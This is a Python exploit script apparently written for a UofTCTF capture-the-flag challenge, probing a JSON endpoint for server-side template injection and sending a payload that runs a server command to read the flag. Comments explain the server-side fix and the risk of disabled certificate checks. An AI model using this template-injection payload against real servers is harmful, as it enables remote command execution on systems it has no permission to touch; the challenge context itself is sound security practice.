#!/usr/bin/env python3
import requests
import urllib3
import json
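# Silence only the warning raised by verify=False below; every other urllib3
# warning category stays visible.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"
ENDPOINT = BASE_URL + "/welcome/default/index.json"

# requests has no default timeout: without one a stalled connection blocks
# the script forever.
TIMEOUT = 15


def _probe(data):
    """Send *data*, JSON-encoded, in the ``json`` query parameter of ENDPOINT.

    Returns the ``requests.Response`` object.

    NOTE(review): verify=False disables TLS certificate validation, so the
    peer is not authenticated and the response could come from anything on
    the network path. Acceptable for a throwaway challenge host; do not copy
    this into tooling that talks to real systems.
    """
    return requests.get(
        ENDPOINT,
        params={"json": json.dumps(data)},
        verify=False,
        timeout=TIMEOUT,
    )


# Step 1: check that the view answers when requested with a .json extension.
print("[*] Testing .json extension...")

r = _probe({"test": "value"})

print(f"Status: {r.status_code}")
print(f"Content-Type: {r.headers.get('Content-Type')}")
print(f"Content: {r.text[:300]}")

if r.status_code == 200:
    print("\n[+] .json extension works!")

    # Step 2: send a template expression as a JSON value. If the response
    # contains the evaluated result instead of the literal string, the server
    # is treating request data as template source. The server-side fix is to
    # pass request data to templates as variables only, never as template text.
    print("\n[*] Testing SSTI in JSON parameter...")

    payload_data = {
        "test": "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"
    }

    r2 = _probe(payload_data)

    print(f"Status: {r2.status_code}")

    # NOTE(review): the hostname in BASE_URL also contains "uoftctf", so a
    # response that echoes its own URL would match here as well. Confirm the
    # flag format and tighten the marker if false positives show up.
    if "uoftctf" in r2.text.lower():
        print("\n[!!!] FLAG FOUND!")
        print(r2.text)
    else:
        # Explicit encoding: the platform default may be unable to encode
        # characters in the response body and would raise on write.
        with open("json_response.txt", "w", encoding="utf-8") as f:
            f.write(r2.text)
        print(f"Response saved. Length: {len(r2.text)}")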
